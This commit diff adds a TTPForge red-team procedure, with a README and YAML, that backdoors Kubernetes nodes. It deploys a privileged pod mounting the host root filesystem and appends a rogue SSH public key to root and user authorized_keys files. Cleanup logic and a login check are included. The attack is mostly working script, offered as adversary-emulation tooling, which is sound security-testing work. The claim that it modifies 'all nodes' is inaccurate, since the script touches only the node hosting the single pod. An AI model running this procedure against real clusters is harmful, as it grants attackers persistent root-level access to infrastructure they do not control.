Added TTP to backdoor Kubernetes nodes with rogue SSH keys for persistence

Summary:
**Added:**

- Created `backdoor-k8s-nodes-authorized-keys.yaml` TTP to inject rogue SSH keys into Kubernetes nodes
- Added steps for deploying a privileged pod to modify `authorized_keys` files on all nodes
- Included cleanup logic to restore original `authorized_keys` files after the attack
- Created a detailed `README.md` explaining arguments, requirements, and usage examples

**Changed:**

- Updated `extract-k8s-secrets/README.md` with correct example command for running TTP

Differential Revision: D61690546
Jayson Grace authored and facebook-github-bot committed Aug 23, 2024
1 parent 113e4cb commit fd5a924
Showing 2 changed files with 283 additions and 0 deletions.
persistence/containers/k8s/backdoor-k8s-nodes-authorized-keys/README.md
@@ -0,0 +1,87 @@
# Backdoor Kubernetes Nodes with Authorized Keys

![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)

This TTP adds a rogue public SSH key to the `authorized_keys` file on all Kubernetes
nodes to maintain persistence. It assumes access to a Kubernetes cluster with the
ability to execute commands on the nodes. The TTP backs up the original
`authorized_keys` file before appending the rogue key and restores the backup during cleanup.
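
Concretely, the change to each reachable account is an append plus a backup; on a node it is equivalent to the following sketch (default path shown, with `$ROGUE_KEY` standing in for the `rogue_key` argument):

```bash
# Back up the current file, then append the rogue public key
cp "$HOME/.ssh/authorized_keys" "$HOME/.ssh/authorized_keys.bak"
echo "$ROGUE_KEY" >> "$HOME/.ssh/authorized_keys"
```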

## Arguments

- **artifacts_dir**: The directory to store the downloaded tools.

  Default: `/tmp`

- **eks_cluster**: Indicates if the target Kubernetes cluster is running on EKS.

  Default: `true`

- **rogue_key**: The rogue public SSH key to be added to the `authorized_keys` file.

- **ssh_authorized_keys**: Path to the `authorized_keys` file.

  Default: `$HOME/.ssh/authorized_keys`

- **target_cluster**: The name of the target Kubernetes cluster.

- **target_ns**: The namespace for deploying the privileged pod.

  Default: `kube-system`

- **target_region**: The region where the target cluster is located.

  Default: `us-east-1`
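
Any of the defaulted arguments can be overridden the same way as the required ones; for instance (hypothetical cluster, region, and namespace values, same invocation style as the Examples section below):

```bash
ttpforge run forgearmory//persistence/containers/k8s/backdoor-k8s-nodes-authorized-keys/backdoor-k8s-nodes-authorized-keys.yaml \
  --arg rogue_key="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGXY7PWSZ7QafZ5LsBxGVtAcAwn706dJENP1jXlX3fVa Test public key" \
  --arg target_cluster=YOUR-CLUSTER-NAME \
  --arg target_region=us-west-2 \
  --arg target_ns=default
```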

## Requirements

1. Kubernetes cluster with access to run privileged commands and modify files on
   the nodes.
1. `kubectl` installed and configured to interact with the target cluster.

### EKS

1. A valid set of AWS credentials. They can be provided through environment
   variables (see the sketch after this list):

   - `AWS_ACCESS_KEY_ID`
   - `AWS_SECRET_ACCESS_KEY`
   - `AWS_SESSION_TOKEN`

   OR:

   - `AWS_PROFILE`

1. The AWS CLI installed.
1. `python3`, `pip3`, and `git` installed.
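
For example, static credentials can be exported and sanity-checked before running the TTP (placeholder values shown; `aws sts get-caller-identity` simply confirms which principal the credentials resolve to):

```bash
export AWS_ACCESS_KEY_ID="AKIAXXXXXXXXXXXXXXXX"      # placeholder
export AWS_SECRET_ACCESS_KEY="XXXXXXXXXXXXXXXXXXXX"  # placeholder
export AWS_SESSION_TOKEN="XXXXXXXX"                  # placeholder; only needed for temporary credentials
aws sts get-caller-identity                          # verify the credentials work
```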

## Examples

You can run the TTP using the following command (adjust arguments as needed):

```bash
ttpforge run forgearmory//persistence/containers/k8s/backdoor-k8s-nodes-authorized-keys/backdoor-k8s-nodes-authorized-keys.yaml \
  --arg rogue_key="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGXY7PWSZ7QafZ5LsBxGVtAcAwn706dJENP1jXlX3fVa Test public key" \
  --arg target_cluster=YOUR-CLUSTER-NAME
```
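
If you need a throwaway key pair for the `rogue_key` argument, one option is the following sketch (assumes `ssh-keygen` is available locally; the paths are arbitrary):

```bash
ssh-keygen -t ed25519 -f /tmp/rogue_key -N "" -C "Test public key"
cat /tmp/rogue_key.pub  # pass this value via --arg rogue_key=...
```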

## Steps

1. **aws_connector**: Validates and sets up the AWS environment (if targeting an
EKS cluster).
1. **setup_kubeconfig_for_eks**: Sets up kubeconfig for EKS cluster (if targeting an
EKS cluster).
1. **create_privileged_pod_manifest**: Creates a privileged pod manifest for executing
commands on the nodes.
1. **deploy_privileged_pod**: Deploys the privileged pod in the target namespace.
1. **modify_authorized_keys_on_nodes**: Backs up and modifies the `authorized_keys`
file on all Kubernetes nodes, adding the rogue SSH key.
1. **cleanup**: Restores the original `authorized_keys` files and deletes the
privileged pod.
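
After the TTP completes (and before cleanup runs), persistence can be checked by authenticating to a node with the matching private key; a sketch, using a hypothetical node address:

```bash
ssh -i /tmp/rogue_key -o IdentitiesOnly=yes root@NODE_IP  # NODE_IP is hypothetical
```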

## MITRE ATT&CK Mapping

- **Tactics**:
- TA0003 Persistence
- **Techniques**:
- T1078 Valid Accounts

persistence/containers/k8s/backdoor-k8s-nodes-authorized-keys/backdoor-k8s-nodes-authorized-keys.yaml
@@ -0,0 +1,196 @@
---
api_version: 2.0
uuid: 65a544be-d51e-416f-abc6-00e56c6bc911
name: backdoor_k8s_nodes_authorized_keys
description: |
  This TTP adds a rogue public SSH key to the `authorized_keys` file on all Kubernetes nodes to maintain persistence.
  It assumes access to a Kubernetes cluster with the ability to execute commands on the nodes. The TTP backs up the original `authorized_keys` file before appending the rogue key and restores the backup during cleanup.
args:
  - name: artifacts_dir
    description: The directory to store the downloaded tools.
    default: /tmp
  - name: eks_cluster
    description: Indicates if the target Kubernetes cluster is running on EKS.
    default: true
  - name: rogue_key
    description: "The rogue public SSH key to be added to the `authorized_keys` file"
  - name: ssh_authorized_keys
    description: Path to the `authorized_keys` file.
    default: "$HOME/.ssh/authorized_keys"
  - name: target_cluster
    description: The target Kubernetes cluster name.
  - name: target_ns
    description: The target namespace for deploying the privileged pod.
    default: kube-system
  - name: target_region
    description: The region where the target cluster is located.
    default: us-east-1
requirements:
  platforms:
    - os: linux
    - os: darwin
mitre:
  tactics:
    - TA0003 Persistence
  techniques:
    - T1078 Valid Accounts

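# Steps are rendered with Go templating before execution; the two EKS helper
# steps below are included only when eks_cluster is true.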
steps:
  {{ if .Args.eks_cluster }}
  - name: aws_connector
    description: Validate and set up the AWS environment.
    ttp: //helpers/cloud/aws/validate-aws-env-configured.yaml
    args:
      region: "{{ .Args.target_region }}"

  - name: setup_kubeconfig_for_eks
    description: Set up kubeconfig for the EKS cluster.
    ttp: //helpers/containers/k8s/setup-kubeconfig-for-eks.yaml
    args:
      cluster_name: "{{ .Args.target_cluster }}"
      cluster_region: "{{ .Args.target_region }}"
  {{ end }}

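  # The heredoc below writes a manifest for a service account, RBAC objects, and
  # a privileged pod that mounts the node's root filesystem at /host and shares
  # the host PID namespace, giving the pod full access to files on that node.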
  - name: create_privileged_pod_manifest
    description: Create the manifest for a privileged pod to run commands on the nodes.
    inline: |
      cat > {{ .Args.artifacts_dir }}/privileged_pod.yaml <<EOF
      apiVersion: v1
      kind: ServiceAccount
      metadata:
        name: privileged-sa
        namespace: {{ .Args.target_ns }}
      ---
      apiVersion: rbac.authorization.k8s.io/v1
      kind: ClusterRole
      metadata:
        name: privileged-role
      rules:
        - apiGroups: [""]
          resources:
            - nodes/log
          verbs: ["get", "list", "watch"]
      ---
      apiVersion: rbac.authorization.k8s.io/v1
      kind: ClusterRoleBinding
      metadata:
        name: privileged-role-binding
      roleRef:
        apiGroup: rbac.authorization.k8s.io
        kind: ClusterRole
        name: privileged-role
      subjects:
        - kind: ServiceAccount
          name: privileged-sa
          namespace: {{ .Args.target_ns }}
      ---
      apiVersion: v1
      kind: Pod
      metadata:
        name: privileged-pod
        namespace: {{ .Args.target_ns }}
      spec:
        serviceAccountName: privileged-sa
        hostPID: true
        containers:
          - name: privileged
            image: alpine:latest
            securityContext:
              privileged: true
            command: ["/bin/sh"]
            args: ["-c", "sleep infinity"]
            volumeMounts:
              - name: host-root
                mountPath: /host
        volumes:
          - name: host-root
            hostPath:
              path: /
              type: Directory
      EOF
    cleanup:
      inline: rm {{ .Args.artifacts_dir }}/privileged_pod.yaml

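  # kubectl apply creates every object in the manifest above; the paired cleanup
  # action deletes them again when the TTP tears down.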
  - name: deploy_privileged_pod
    description: Deploy the privileged pod in the target namespace.
    inline: kubectl apply -f {{ .Args.artifacts_dir }}/privileged_pod.yaml -n {{ .Args.target_ns }}
    cleanup:
      inline: kubectl delete -f {{ .Args.artifacts_dir }}/privileged_pod.yaml -n {{ .Args.target_ns }}

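  # This step polls until the pod reports the Running phase, then uses kubectl
  # exec to back up and append the rogue key to each authorized_keys file found
  # under /host/root and /host/home/* on the node hosting the pod.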
  - name: modify_authorized_keys_on_nodes
    description: Back up and modify the authorized_keys file on all Kubernetes nodes.
    inline: |
      # Wait for the pod to be in the Running state
      while true; do
        POD_STATUS=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} --no-headers 2>/dev/null)
        if [[ -z "$POD_STATUS" ]]; then
          echo "Privileged pod not found. Waiting for it to appear..."
        else
          POD_PHASE=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} -o jsonpath='{.status.phase}' 2>/dev/null)
          if [[ "$POD_PHASE" == "Running" ]]; then
            echo "Privileged pod is running."
            break
          else
            echo "Waiting for privileged pod to be running... Current phase: $POD_PHASE"
          fi
        fi
        sleep 5
      done
      POD_NAME="privileged-pod"
      kubectl exec -n {{ .Args.target_ns }} $POD_NAME -- /bin/sh -c '
        if [ -d /host ]; then
          echo "Success: Host file system is mounted at /host."
          for user_home in /host/root /host/home/*; do
            if [ -d "$user_home/.ssh" ]; then
              AUTHORIZED_KEYS_PATH="$user_home/.ssh/authorized_keys"
              echo "Checking authorized_keys at $AUTHORIZED_KEYS_PATH..."
              if [ -f "$AUTHORIZED_KEYS_PATH" ]; then
                echo "Found authorized_keys at $AUTHORIZED_KEYS_PATH"
                cp "$AUTHORIZED_KEYS_PATH" "$AUTHORIZED_KEYS_PATH.bak" || true
                echo "{{ .Args.rogue_key }}" >> "$AUTHORIZED_KEYS_PATH" || true
                echo "Rogue key added to $AUTHORIZED_KEYS_PATH"
              else
                echo "Warning: authorized_keys not found at $AUTHORIZED_KEYS_PATH"
              fi
            else
              echo "No .ssh directory found at $user_home, skipping..."
            fi
          done
        else
          echo "Failure: Host file system is not mounted at /host."
          exit 1
        fi
      '
    cleanup:
      inline: |
        # Check if the pod still exists before trying to clean up
        POD_STATUS=$(kubectl get pod privileged-pod -n {{ .Args.target_ns }} --no-headers 2>/dev/null)
        if [[ -n "$POD_STATUS" ]]; then
          echo "Restoring original authorized_keys files..."
          kubectl exec -n {{ .Args.target_ns }} privileged-pod -- /bin/sh -c '
            if [ -d /host ]; then
              echo "Restoring keys on host:"
              for user_home in /host/root /host/home/*; do
                if [ -d "$user_home/.ssh" ]; then
                  AUTHORIZED_KEYS_PATH="$user_home/.ssh/authorized_keys"
                  if [ -f "$AUTHORIZED_KEYS_PATH.bak" ]; then
                    cp "$AUTHORIZED_KEYS_PATH.bak" "$AUTHORIZED_KEYS_PATH" || true
                    rm "$AUTHORIZED_KEYS_PATH.bak" || true
                    echo "Restored authorized_keys at $AUTHORIZED_KEYS_PATH"
                  else
                    echo "Warning: backup file not found at $AUTHORIZED_KEYS_PATH.bak"
                  fi
                else
                  echo "No .ssh directory found at $user_home, skipping..."
                fi
              done
            else
              echo "Failure: Host file system is not mounted at /host."
            fi
          '
        else
          echo "Privileged pod no longer exists. Skipping cleanup of authorized_keys."
        fi
        echo "Cleanup done!"
